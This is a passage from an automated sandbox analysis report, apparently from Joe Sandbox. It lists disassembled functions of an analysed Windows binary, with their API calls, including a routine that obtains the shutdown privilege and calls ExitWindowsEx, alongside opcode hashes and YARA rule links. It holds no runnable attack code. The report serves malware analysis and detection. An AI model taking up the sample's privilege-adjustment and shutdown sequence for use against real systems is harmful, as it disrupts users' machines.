                                                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156039329-0
                                                                                                                            • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                            • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                                            • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                            • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2087232378-0
                                                                                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405280 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                                                              • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                                                              • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1658689577-0
                                                                                                                            • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                                            • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                                                            • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                                            • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                                            • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                                            • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                            • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                                            • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                            • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 442123175-0
                                                                                                                            • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                            • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                                            • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                            • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FormatMessage
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1306739567-0
                                                                                                                            • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                                            • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                                            • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                                            • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetEndOfFile.KERNEL32(?,02018000,0040AA59,00000000), ref: 004076B3
                                                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 734332943-0
                                                                                                                            • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                            • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                                            • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                            • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                            • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                                            • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                            • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                            • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                                            • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                            • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharPrev
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 122130370-0
                                                                                                                            • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                                            • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                            • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                                                            • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                            • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                            • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                            • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                            • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                            • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                                            • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                            • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                            • API String ID: 107509674-3733053543
                                                                                                                            • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                            • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
